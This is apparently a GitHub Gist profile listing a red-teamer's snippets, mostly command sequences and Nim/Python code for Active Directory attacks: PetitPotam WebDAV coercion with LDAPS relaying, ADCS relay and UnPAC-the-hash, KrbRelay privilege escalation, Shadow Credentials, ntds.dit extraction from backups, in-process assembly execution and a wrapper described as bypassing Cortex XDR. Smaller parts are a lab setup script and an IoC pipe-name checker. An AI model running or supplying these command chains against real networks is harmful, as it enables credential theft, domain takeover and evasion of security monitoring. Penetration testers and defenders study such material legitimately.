zimnyaa
@zimnyaa
zimnyaa / pyd-executeassembly.nim
Created January 12, 2022 14:19
Execute CLR assembly in the current process and redirect its output to file. Can be compiled and used as a Python module.
import winim/clr
import os
import nimpy
#Create dup handles
proc dup(oldfd: FileHandle): FileHandle {.importc, header: "unistd.h".}
proc dup2(oldfd: FileHandle, newfd: FileHandle): cint {.importc, header: "unistd.h".}
@zimnyaa
zimnyaa / vhdx-on-smb-share.sh
Created January 19, 2022 12:02
Unpack .vhdx and decrypt ntds.dit (often used for backups and can be found on open SMB shares)
# runs on kali out-of-the-box
# this is not a ready-made script, more like a collection of commands
# QEMU mounting a drive
modprobe nbd max_part=16
qemu-nbd -c /dev/nbd0 filename.vhdx
# look for the second partition, usually where the FS resides
fdisk -l /dev/nbd0
@zimnyaa
zimnyaa / webclient-rbcd.sh
Last active April 1, 2024 03:45
PetitPotam WebDAV coerced authentication + LDAPS relaying
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local
# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da
# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
@zimnyaa
zimnyaa / nim-assembly-wrapper.py
Created January 31, 2022 13:44
Used in an engagement to bypass Cortex XDR (use NO to break argument signatures). Was about to add unhooking/AMSI+ETW patches, but Nimpackt came out a day after, and you can just use that instead.
import sys, os
nim_template = """import winim/clr
import os
import strutils
proc execute(assembly_bytes: openarray[byte], args: openarray[string]) =
@zimnyaa
zimnyaa / hidewindow.nim
Created February 7, 2022 12:44
Hiding windows in a current process (code snippet from xyrella)
when defined hidewindow:
  proc wndenumcallback(windowHandle: HWND, param: LPARAM): WINBOOL {.stdcall.} =
    var process_id: DWORD
    var wanted = cast[ptr DWORD](param)
    GetWindowThreadProcessId(windowHandle, &process_id)
    if process_id == wanted[]:
      ShowWindow(windowHandle, SW_FORCEMINIMIZE)
    return true
  proc hidewindow() =
@zimnyaa
zimnyaa / unpac-adcs.sh
Created February 14, 2022 13:52
Command sequence I use for UnPAC the hash attacks with ADCS relaying
# setting up the relay. I avoid LLMNR/NBNS/DHCPv6/etc, as they're too noisy, and prefer either UNC path injection
# (somewhere custom), or NTLM hash farming
python3 ./ntlmrelayx.py -t http://ca1.contoso.com/certsrv/certfnsh.asp --adcs -smb2support
# ntlmrelayx ADCS outputs an unencrypted .pfx
cat lowpriv.b64 | base64 --decode > lowpriv.pfx
# dirkjanm PKINITTools, had to patch impacket previously to output AES session keys
python3 gettgtpkinit.py contoso.com/lowpriv -cert-pfx lowpriv.pfx lowpriv.ccache -v
@zimnyaa
zimnyaa / krbrelay-lpe.sh
Last active January 12, 2023 00:05
Command sequence to LPE on Win10 via KrbRelay (thanks cube0x0!)
# creating RPC server, relaying SYSTEM Kerberos authentication to LDAP
# we will use Shadow Credentials instead of RBCD to not rely on ms-ds-machineAccountQuota and be a little more stealthy
# clsid from cube0x0 KrbRelay repo
.\KrbRelay.exe -spn ldap/dc1.contoso.com -shadowcred -clsid 0bae55fc-479f-45c2-972e-e951be72c0c1
# KrbRelay outputs a Rubeus command for you, but you do not need to unPAC
Rubeus.exe asktgt /user:Client1$ /certificate:<cert> /password:"<pass>" /nowrap
# PTH to SMB is a spook, better request a ticket
.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Install /self /altservice:cifs/client1.contoso.com /nowrap
@zimnyaa
zimnyaa / adcs-lab.ps1
Created February 14, 2022 14:31
Simple AutomatedLab ADCS lab setup.
New-LabDefinition -Name Lab1CA1 -DefaultVirtualizationEngine Azure
$azureDefaultLocation = 'Australia East' # CHANGETHIS
Add-LabAzureSubscription -DefaultLocationName $azureDefaultLocation
#defining default parameter values, as these ones are the same for all the machines
$PSDefaultParameterValues = @{
    'Add-LabMachineDefinition:DomainName' = 'contoso.com'
@zimnyaa
zimnyaa / iocpipe.py
Created February 17, 2022 11:10
Check whether an SMB pipe name for pivoting is a known IoC
import re, sys
def rule_startswith(ioc_string):
    def __match(pipename):
        if pipename.startswith(ioc_string):
            print("\tMATCH startswith({})".format(ioc_string))
            return True
        return False
    return __match
@zimnyaa
zimnyaa / shadowunpac.sh
Created March 21, 2022 09:45
ShadowCredentials + unPAC the hash
# getting the current ticket
sliver (SESSION) > rubeus tgtdeleg /nowrap
echo <ticket> | base64 --decode > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
# adding ms-KeyCredentialLink
proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert
# requesting a ticket with ShadowCredentials
proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache